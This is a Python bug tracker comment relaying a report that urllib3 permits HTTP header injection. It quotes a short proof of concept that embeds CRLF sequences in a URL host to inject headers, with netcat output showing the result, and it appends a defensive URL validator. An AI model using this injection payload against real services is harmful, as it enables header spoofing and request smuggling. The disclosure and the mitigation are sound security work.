STINNER Victor <vstin...@redhat.com> added the comment:

bpo-36276 has been marked as a duplicate of this issue.

According to the following message, urllib3 is also vulnerable to HTTP Header Injection: https://bugs.python.org/issue36276#msg337837

Copy of Alvin Chang's msg337837:
"""
I am also seeing the same issue with urllib3

import urllib3

pool_manager = urllib3.PoolManager()

host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a"

try:
    info = pool_manager.request('GET', url).info()
    print(info)
except Exception:
    pass

nc -l localhost 7777
GET /?a=1 HTTP/1.1
X-injected: header
TEST: 123:8080/test/?test=a HTTP/1.1
Host: localhost:7777
Accept-Encoding: identity
"""

----------

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue30458>
_______________________________________
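
An added example, not part of the tracker message and not the CPython or urllib3 fix: a pre-flight check that refuses URLs containing control characters or whitespace before they reach an HTTP client, run against the host string from the report above. The names `reject_unsafe_url`, `check` and `UnsafeURLError` and the reject-rather-than-encode policy are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption for this example: any ASCII control character, space or DEL
# in a URL is rejected outright rather than percent-encoded.
_UNSAFE = re.compile(r"[\x00-\x20\x7f]")


class UnsafeURLError(ValueError):
    """Raised when a URL could alter the HTTP request framing."""


def reject_unsafe_url(url):
    """Return url unchanged if it is safe to place in a request line.

    Hypothetical helper: raises UnsafeURLError when the URL contains
    characters that would end the request line early (CR, LF, space, ...).
    The raw string is checked before any parsing, so a parser that
    silently strips such characters cannot hide them.
    """
    match = _UNSAFE.search(url)
    if match:
        raise UnsafeURLError(
            "URL contains disallowed character %r at offset %d"
            % (match.group(), match.start())
        )
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise UnsafeURLError("URL must be absolute http(s) with a host")
    return url


def check(url):
    """Return (accepted, reason) instead of raising, e.g. for logging."""
    try:
        reject_unsafe_url(url)
        return True, "ok"
    except UnsafeURLError as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Host string copied from the report above.
    host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
    for candidate in ("http://" + host + ":8080/test/?test=a",
                      "http://localhost:8080/test/?test=a"):
        print(check(candidate))
```

Applied at the point where application code accepts a URL or host from outside, this stops the request from being built at all, regardless of which HTTP client library sits underneath.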